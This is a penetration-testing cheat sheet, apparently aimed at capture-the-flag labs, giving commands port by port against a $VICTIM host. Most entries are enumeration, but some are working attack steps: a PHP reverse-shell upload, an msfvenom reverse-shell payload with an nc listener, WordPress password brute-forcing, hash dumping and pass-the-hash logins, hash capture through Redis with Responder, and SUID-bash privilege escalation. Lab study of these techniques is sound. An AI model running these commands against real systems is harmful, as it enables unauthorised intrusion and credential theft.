Enumeration
Scans
Initial scan
Kali
nmap -A $VICTIMLonger scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMEven longer scan
Kali
nmap -sC -sV -p- $VICTIMScan for vulnerabilities
Change ports to the ports found from previous scans
Kali
nmap -p1,2,3,4 --script=vuln $VICTIMPorts
TCP/21 - FTP
Common Credentials
Usernames
anonymous
admin
guestPasswords
anonymous
password
guestAccess FTP
Kali
ftp $VICTIM 21List files
Kali(ftp)
lsList files (using Curl)
Kali
curl ftp://anonymous:anonymous@$VICTIM:21Download files
Change to Binary mode & passive (an important setting if you're uploading/downloading binary files like pictures and/or executables!).
Kali(ftp)
binary
passiveKali(ftp)
get $fileName.txtDownload all files
Kali(ftp)
mget *Download all files to the current directory (using Wget)
Kali
wget -m ftp://anonymous:anonymous@$VICTIM:21 -ndUpload files
If there is also a website being hosted and you can see the try adding a webshell and going to it from the browser.
Kali(ftp)
binary
passive
put php-reverse-shell.phpTCP/22 - SSH
SSH into host
Kali
ssh $USERNAME@$VICTIM
#SSH into non-standard port
ssh $USERNAME@$VICTIM -p2222Check this page for cracking examples
TCP/25 - SMTP
Kali
telnet $VICTIM 25
HELO
VRFY root
QUITKali
sudo nmap $VICTIM -p25 --script smtp-commands Kali
sudo nmap $VICTIM -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -Kali
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $VICTIMCheck for vulnerabilities
Kali
sudo nmap $VICTIM -p25 --script smtp-vuln* Check this page for cracking examples
UDP/53 - DNS
Find subdomains
Example
DNS, SMB, and SNMPUDP/53 - DNS
Kali
dig -t AXFR $HOST.thm @$DNSSERVERTCP/80:443 - HTTP(s)
Web Enumeration
Useful info on how to run a lot of the tools in this section.
Info gathering info
Check if any pages are listed
http://$VICTIM/robots.txt
http://$VICTIM/sitemap.xmlCheck certificate for hostname. Then add to hosts file.
Examples
Create wordlist
Creating a wordlist from this site based off of what is on the website.
Examples
Kali
cewl -m 8 -w $LIST.lst https://$VICTIM Find Directories
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txtKali
dirb http://$VICTIM/
dirb http://$VICTIM:$PORT/
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt -z10 Find Pages
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtKali
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -lKali
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txtKali
dirsearch -u $VICTIM:$PORT Find pages with certain extensions
Examples
Find pages with certain extensions
Kali
head /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt web-extensions.txt
.asp
.aspx
.bat
.c
.cfm
.cgi
.css
.com
.dll
.exeKali
ffuf -u http://$VICTIM/indexFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt Find pages and exclude certain extensions
Example
Find pages and exclude certain extensions
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-Using filters
Example
By adding -fc 403 (filter code) we'll hide from the output all 403 HTTP status codes.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403Use -mc 200 (match code) instead of having a long list of filtered codes.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200We can use a regexp to match all files beginning with a dot.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fr '/\..*'Fuzzing parameters
Example
ffuf allows you to put the keyword anywhere we can use it to fuzz for parameters.
Kali
ffuf -u http://$VICTIM/sqli-labs/Less-1/?FUZZ=1 -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39Find Vulnerabilities
Nikto Tuning (-T) Options
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)Scan for misconfigurations
nikto -h $VICTIM -T 2 -Format txt Scan for SQL injection vulnerabilities.
nikto -h $VICTIM -T 9 -Format txt Authenticated nikito scan
Examples
Kali
nikto -id $USERNAME:$PASSWORD -h http://$VICTIM:80/manager/htmlCheck for Shellshock
nmap -p 80 $VICTIM --script http-shellshock Check for Heartbleed
nmap -p 443 $VICTIM --script ssl-heartbleedFuzzing Subdomains
Example
Kali
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://$URL.thm/' -H "Host: FUZZ.$URL.thm" > results.txt
grep -v '290 W' results.txtExample
Kali
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$URL.thm Example
Kali
ffuf -u http://FUZZ.$URL.thm -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txtProxifying ffuf traffic
Example
Kali
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x http://127.0.0.1:8080It's also possible to send only matches to your proxy for replaying:
Kali
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -replay-proxy http://127.0.0.1:8080SQLMap
Get information
Can be used to get things like usernames and passwords or other information in the tables.
Example
Kali
sqlmap -u http://$VICTIM/$PAGE.php --forms --dump
OR
sqlmap -r request.txt --dbms=mysql --dump #Get request from BurpGet Databases
Examples
First capture the request of the page with Burp
Kali
sudo sqlmap -r request.req --dbsGet tables
Kali
sudo sqlmap -r request.req --current-db $DATABASE --tablesGet fields for specified table
Kali
sudo sqlmap -r request.req --current-db $DATABASE --tables -T $TABLE --columnsGet values of specific fields
Kali
sudo sqlmap -r request.req --current-db $DATABASE --tables -T $TABLE -C $FIELD1, $FIELD2 --dumpRescan SQLMap
SQLMap will just give you the same results if you keep trying the same command, even if things have changed. Remove the cache to resolve this.
Kali
rm -rf /root/.sqlmap/output/$HOST.thm/Cookies
Example
Get the flag with developer console by checking the cookie.
HTTP Headers
Example
Run Web server
Kali
python2 -m SimpleHTTPServer 81Wordpress
Scan wordpress site
Examples
Kali
HTTP
wpscan --url http://$VICTIM
HTTPS
wpscan --url http://$VICTIM --disable-tls-checksEnumerate wordpress site
Examples
RetroWordpress: CVE-2021-29447
Kali
wpscan --url http://$VICTIM -e p,t,uBruteforce admin page
Kali
wpscan --url http://$VICTIM --passwords /usr/share/wordlists/rockyou.txt.git folder found
Examples
Kali
pip install git-dumper
mkdir git
git-dumper https://$VICTIM/sources/new/.git/ git/
cd git
git log
grep -r pass *Jenkins
Reverse Shell
Examples
UDP/88 - Kerberos
Username Enumeration
Finds valid users
Examples
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=$commonName $ListOfUsernames.txtGet Ticket
Examples
The hash type is Kerberos 5 etype 23 AS-REP.
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM $commonNameTCP/110 - POP3
Logging in with credentials
Examples
telnet $VICTIM 110
USER root
PASS root
RETR 1 #change number for each available message
QUITCheck this page for cracking examples
TCP/135 - RPC
Kali
rpcclient -U '' $VICTIM
srvinfo
netshareenum # print the real file-path of shares; good for accurate RCELogin with credentials
Examples
Kali
python3.9 /opt/impacket/build/scripts-3.9/psexec.py $USER@$VICTIM
Password: $PASSWORDTCP/139 - NetBIOS
Examples
Enumerate SMB
Kali
nmap $VICTIM --script=smb-enum*Examples
Kali
nbtscan $VICTIMExamples
Kali
enum4linux $VICTIMUDP/161 - SNMP
Collect Information
Examples
Kali
git clone https://gitlab.com/kalilinux/packages/snmpcheck.git
cd snmpcheck/
gem install snmp
chmod +x snmpcheck-1.9.rb
./snmpcheck-1.9.rb $VICTIM -c $COMMUNITYSTRINGTCP/389 - LDAP
Enumerating Active Directory
Examples
Breaching Active Directory
Examples
Exploiting Active Directory
Examples
Persisting Active Directory
Examples
TCP/445 - SMB
Scanning
Examples
Kali
nmap $VICTIM --script=smb-enum*Common Credentials
Usernames
anonymous
admin
guest
smbclient -L //$VICTIM/ -U $USERNAMESList Shares
Option #1
Examples
GatekeeperAttacktive DirectoryBasic Pentesting
Kali
smbclient -L //$VICTIM/
# List shares on a non-standard SMB/Samba port
smbclient -L //$VICTIM/ -p $PORT Option #2
Examples
Victim
net shareDownload files
Option #1
Kali
smbclient \\\\$VICTIM\\$SHARE
prompt
mget *Option #2
Kali
smbmap -H $VICTIM
smbmap -H $VICTIM-P $PORTOption #3
Kali
smbget -R smb://$VICTIM/$SHARE
# List shares on a non-standard SMB/Samba port
smbget -R smb://$VICTIM:$PORT/$SHAREUpload files
Option #1
Kali
smbclient \\\\$VICTIM\\$SHARE
put $FILEDetect Vulnerabilities
# Check if vulnerable to EternalBlue
sudo nmap $VICTIM -p445 --script smb-vuln-ms17-010 # Check if vulnerable to SambaCry
sudo nmap $VICTIM -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-versionTCP/667 - IRC
irssi -c $VICTIM -p $PORTTCP/873 - RSYNC
Check Modules
sudo nmap $VICTIM -p873 --script rsync-list-modulesList files
Example
rsync --list-only rsync://$VICTIM
rsync --list-only rsync://$USERNAME@$VICTIM/$FOLDER
Password: $PASSWORDTransfer files
Example
rsync authorized_keys rsync://$USERNAME@$VICTIM/$FOLDER/.ssh
Password: $PASSWORDTCP/2049 - NFS
sudo nmap $VICTIM -p111 --script-nfs*Mount drive
Examples
#This will list some folders hopefully
showmount -e $VICTIM
#Make a dir
mkdir /mnt/nfs
#/opt/conf is just an example, put what came out after showmount
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfsUpload ID_RSA key to login
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: pass
ssh $USERNAME@$VICTIMCreate mount
sudo mkdir /mnt/FOO
mount -t nfs $VICTIM:$SHARE /tmp/mount/ -nolock
sudo mount //$VICTIM:/$SHARE /mnt/FOOInteresting loot to look for
- id_rsa from users home directoriesPrivilege Escalation
Example of how you can get root shell. All commands except the last one are run on our Kali machine where we can control the permissions fully. Then we just run the exploit as the normal user we already have access to.
#Download exploit
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
mv bash /mount/point
chown root /mount/point/bash
chmod +u /mount/point/bash
chmod +d /mount/point/bash
#SSH in as victim and run the following
/mount/point/bash -pTCP/3306 - SQL
examples
mysql -u $USER -h $VICTIM -p'$PASSWORD'Kali(mysql)
show databases;
use $DATABASE;
show tables;
select * from $TABLE;TCP/3389 - RDP
Scan
Kali
sudo nmap $VICTIM -p3389 --script rdp-ntlm-info Login to host
Kali
rdesktop -u $USERNAME $VICTIMKali
remminaExamples
Kali
xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /v:$VICTIM /workarea +clipboardKali
xfreerdp +clipboard /u:"$USERNAME" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: $PASSWORD TCP/5000 - Docker Registry
Add repositories
Example
Kali
subl /etc/docker/daemon.jsondaemon.json
{
"insecure-registries" : ["$VICTIM:5000"]
}Kali
sudo systemctl stop dockerWait 30 seconds
Kali
sudo systemctl start dockerList repositories
Example
The Docker RodeoTCP/5000 - Docker RegistryUmbrella
Kali
curl -s http://$VICTIM:5000/v2/_catalogGet tags of a repository
Example
The Docker RodeoTCP/5000 - Docker RegistryUmbrella
Kali
curl -s http://$VICTIM:5000/v2/$REPOSITORY/tags/listGet manifests
Example
The Docker RodeoTCP/5000 - Docker RegistryUmbrella
Inside the manifest we can find potential credentials
Kali
curl -s http://$VICTIM:5000/v2/$REPOSITORY/manifests/latestDownload the Docker image to find info
Example
Download the Docker image we are going to decompile using
Kali
docker pull $VICTIM:5000/$REPOSITORY
docker images
dive $IMAGE_IDEnter image
Example
Kali
docker -H $VICTIM:5000 images
docker -H $VICTIM:5000 run -v /:/mnt --rm -it $REPOSITORY chroot /mnt shUploading Malicious Docker Images
Example
Vulnerability #3: Uploading Malicious Docker Images
Kali
docker pullDocker file example
RCE via Exposed Docker Daemon
Example
Vulnerability #4: RCE via Exposed Docker Daemon
Escape via Exposed Docker Daemon
Example
Vulnerability #5: Escape via Exposed Docker Daemon
Shared Namespaces
Example
Vulnerability #6: Shared Namespaces
Misconfigured Privileges
Example
Vulnerability #7: Misconfigured Privileges (Deploy #2)
Privilege Escalation with 2 shells and host mount
Example
Privilege Escalation with 2 shells and host mount
If you have access as root inside a container that has some folder from the host mounted and you have escaped as a non privileged user to the host and have read access over the mounted folder. You can create a bash suid file in the mounted folder inside the container and execute it from the host to privesc.
Victim(root)
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER
cp /bin/bash .
chown root:root bash
chmod 4777 bashVictim(claire-r)
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER-FROM-BEFORE-MIGHT-BE-DIFF-LOCATION
./bash -p TCP/5327 - Postgres
psql -U postgres -p 5437 -h $VICTIM # postgres:postgres
SELECT pg_ls_dir('/');TCP/5985 - WinRM or wsman
See TCP/5986 - WinRM for WinRM information
TCP/5986 - WinRM
Dump Hashes
Dump hashes of other users if the user you have access to has the privilege's to do so. If it does we can potentially use these hashes with evil-winrm to login as these other users.
Examples
Kali
python3 /usr/local/bin/secretsdump.py $DOMAIN/$USER:$PASSWORD@$VICTIM > allhashes.txt
cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniqLogin with found username and password
Examples
Tampering With Unprivileged Accounts
evil-winrm -u $USER -p $PASSWORD -i $VICTIMLogin with found username and hash
Examples
Attacktive DirectoryWindows Local Persistence
evil-winrm -i $VICTIM -u $VICTIMUSERNAME -H $FOUNDHASHTCP/6379 - Redis
Example
redis-cli -h $VICTIM -a "$PASSWORD"
$VICTIM:6379> KEYS *
$VICTIM:6379> KEYS "$VALUE"
$VICTIM:6379> GET "$VALUE"
$VICTIM:6379> LRANGE "$VALUE" 1 100Get Users hash
Example
Kali(redis-cli)
config get *Kali
responder -I ens5 -dvw (You can write anything in place of share, the share does not need to exist)
Kali(redis-cli)
eval "dofile('//$KALI/share')" 0TCP/7070 - AnyConnect
Example
Exploit: https://www.exploit-db.com/raw/49613
For code above and just had to change the shellcode and ip variable.
Kali
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcodeKali
nc -lvnp 4444TCP/11211 - Memcache
Dump cache
Example
Victim
cd /usr/share/memcached/scripts/
./memcached-tool localhost:1121 dumpTCP/27017 - MongoDB
Example
Find Info in DB
Victim
mongoVictim(mongo)
show dbs
use $DBSNAME
show collections
db.$FIELD.find();
exitKnock
Example
Usually used in CTFs. Knock on certain ports in a certain pattern to open up more ports.
Kali
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
Last updated